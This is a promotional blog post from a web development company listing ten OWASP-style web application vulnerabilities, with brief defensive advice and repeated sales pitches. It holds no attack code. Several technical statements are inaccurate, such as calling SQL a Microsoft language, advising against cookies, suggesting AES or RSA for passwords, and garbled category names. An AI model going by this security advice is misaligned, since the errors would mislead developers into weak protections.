Cyber Security Vulnerabilities

Cyber Security Vulnerabilities

Who should be aware of security vulnerabilities and why?

This post is for all kinds of readers. It's for those who are looking to be in the know about cyber security vulnerabilities; and it's for those in any profession or business niche who think they are already in the know, It's for those who are totally out of the know with any information on security vulnerabilities. As you know, a website's cyber security is very important for the business owners because it helps protect against hackers which can result in lost customers and conversely result in maintaining a good reputation. Unfortunately, a lot of web applications are vulnerable, which is why this topic is very relevant nowadays.

What is important to be aware of is that a security vulnerability in a web application provides an opportunity for for hackers to compromise the website by using the mistakes in the website's code, the system settings, and the operating system itself. We will focus on the most dangerous web application vulnerabilities of 2017 based on the test results from the Open Web Application Security Project (OWASP). The OWASP community is a public project for providing reports on the security of web applications. The OWASP community includes corporations, educational institutions, and individuals from all around the world. If you want to avoid security vulnerabilities, you should work to prevent occurrence of any type of weakness in a computer system (even having the WordPress installed) or in anything that leaves information security unsafe.

Security vulnerability type #1: Injection

First thing's first, let's talk about the most important case. Usually, all the data is saved in a database and the requests for the information from the database is written on the Microsoft SQL language. It’s easier than learning Japanese but much more complicated than English. Web applications use SQL requests for work with a date, including editing, adding and removing, for example, when you make a “dear User” change with your information using dashboard. When your data is processing incorrectly, hackers can cunningly implement a special code, which contains a part of an SQL-request. This kind of crafty attack is called an injection. It is a one of the most dangerous vulnerabilities which allows hackers to receive access to a database and grants an opportunity to read, change and even delete the information. For example, they can reach your personal information! Meanwhile, protection from these injections is possible! You should only be aware of cutting off scripts, when processing data from the users, which our Direct Line Development specialists can do for you!

Security vulnerability type #2: Broken Authentication and Session Management

What would your reaction be if you knew that a third party could access your personal account? Have you ever allowed hackers to compromise keys, passwords or session tokens? Broken Authentication and Session Management is a frequently occurring type of cyber vulnerability. Here is a list of the most frequent methods of attack: “Remember me” (It’s so comfy, isn’t it?), “Password Management”, “Logout”, “Secret question” (mine is “Where did you spend your honeymoon?” and what is yours?), “Account update” and “Timeout”.

Wouldn’t it be interesting to know how it all works? Web application uses the session cookies to identify the users. After authorization a special identificator is saved in the browser storage. The browser will use it when sending the requests to the server in the future, every time when someone opens a page of your web application. This is how the web application knows that it is you. BUT: If your identificator gets stolen by the hacker and the system wasn’t implemented with a security check, they will get an access to the system with your account privileges.

To protect yourself you should follow some steps:

  1. Do not use cookies;
  2. Avoid the resources without authentication;
  3. Check the IP;
  4. Request an authorization twice when performing important actions;
  5. SSL certificate;
  6. Close sessions often and in a timely manner.

Security vulnerability type #3: Cross-Site Scripting (XSS)

Do you know that XSS attacks allow users to input their own JS scripts into other users’ browsers? It is achieved by saving the harmful scripts to a database, which will be later requested and displayed by the other users’ browsers. Imagine, that using this kind of an attack, a crafty hacker can, for example, steal the session cookies and input data as well as change the account number for a wire transfer. Disappointing only begins to describe this. The defense methods of this security vulnerability type are similar to the methods for SQL injections. Also, you should be careful when saving the HTML into a database, especially when that HTML will be displayed later.

Security vulnerability type #4: Broken Access Control

A Broken Access Control term could be used to describe a cyber vulnerability which represents a lack of access rights check to the requested object. Web applications check the access rights before displaying the data to the user. However, the applications should also run an access rights check when any function is requested. For example, let’s pass upon an asynchronous loading. If it’s not performed, a talented hacker can fake a request and inevitably gain access to the private data. Fortunately, it can be avoided by setting the access rights check for all the stages of the receiving the data process. Or by calling us here at Direct Line Development!

Security vulnerability type #5: Security Misconfiguration

The next type of security vulnerability is a Security Misconfiguration, which occurs rather frequently, indeed. To tell you the truth, there are way too many cases of misconfiguration of web applications and servers comparing to those when they have a proper configurations. This is why we can’t have nice things!

First, to make sure your web application is secure you need to have a safe configuration of the entire infrastructure, including an operating system, a web-server, a database server and a framework. Second, never use default settings and make sure your software is always in an up to date and good condition. These vulnerabilities are found very often, and a timely system update will prevent any problems in the future. Luckily, you have a way out: contact us!

Security vulnerability type #6: Sensitive Data Exposure Related MaterialsWhy Shouldn't You Create a Wordpress Website?Why Shouldn't You Create a Wordpress Website?Your Complete Guide to the Website Development ProcessYour Complete Guide to the Website Development Process

How data should be protected? Let’s pass upon a crypto and resource protection. Sensitive data should always be encoded: while you travel or at home. Your credit card information and user passwords under no circumstances should be stored without being encoded. Passwords should always be hashed. Make sure, you have a strong crypto/hashing algorithm. We suggest using the AES (Advanced Encryption Standard) or the RSA algorithm in any case of uncertainty.

Sometimes web applications store some personal data, like credit card information and authentication credentials, in an open system and in the case of hacking this data becomes easily accessible. The second example is a data transfer by HTTP protocol. How does it work? The data from a user to the server goes through multiple nodes, such as a home router, a provider router, a data center router, etc. Each of these nodes could be infected with a sniffer, a program which transfers all the data traffic to a hacker.

To sum up, make sure you:

  • Store all your personal data on an encrypted source, in order to save it from being used in case of any server attacks;
  • Transfer sensitive data only by using the HTTPS protocol. This is a regular HTTP which uses an encrypted mechanism. Using HTTPS will protect you from attacks based on a network connection scanning.

Security vulnerability type #7: Insufficient Attack

Most of the web application don't detect, prevent or react to the cyber attacks. To ensure safety and comfort we recommend using a firewall for web application protection. It is a system of components which are intended for protecting the information system from internal and external attacks.

Security vulnerability type #8: Site Request Forgery (CSRF)

Imagine a situation when the User visits a web site created by a hacker and a hidden request is being sent to a server which contains some kind of a harmful operation. How so? Attacks are performed by implementing a script into a web page. That script will try to gain access to the website where the User is already being authenticated and his authentication data is stored in cookies. The script can perform the actions on behalf of the User by using these cookies.

One method of cyber security is a mechanism of which each user’s session is being associated with an additional secret unique code. This key is designed for execution of requests. The key is included in the parameters of each request and a server checks it before performing any actions.

Security vulnerability type #9: Using Components with Known Vulnerabilities

Why is it so unsafe to use components with Known Vulnerabilities? When web application uses the special libraries supplied by the third parties, there is a strong possibility that hackers would look for its code vulnerabilities. Unfortunately, this is happening frequently with WordPress plugins, for example.

It is very important to use latest versions of components, update them in a timely manner and track new known cyber vulnerabilities and try not to use unpopular or non-professional ones. As you can see, there are a lot of complicated issues to follow. Why wouldn’t you simply call us?

Security vulnerability type #10: Unprotected API

Here is a horror flick about that who doesn’t protect their APIs and neglect a cyber security measures. An unprotected API leaves a database open to be unashamedly used by bloodthirsty cyber criminals. We all know what happens to a stolen sensitive information. Poor victims get blackmailed and threatened, get their bank accounts emptied, and even have their database sold on the black market. Access rights to the data need to be checked when using an API. An SQL injection can be hidden in one of the JSON line. It is better to work out the checkups listed above to avoid any problems.

The conclusion: let your cyber security be our goal!

We would like to add one more thing to all of the above. Make backups of your web application on a regular basis. It will help to avoid losing the data and give an opportunity to restore any data at any time as well. What is even better is to let a team of professionals to take care of your website for you.

The good news is that Direct Line Development will be happy to take care of your web application safety. We have a collection of multiple decisions that might help your business. If you have any questions left, feel free to call us or to leave a comment. You are very welcome!

callmap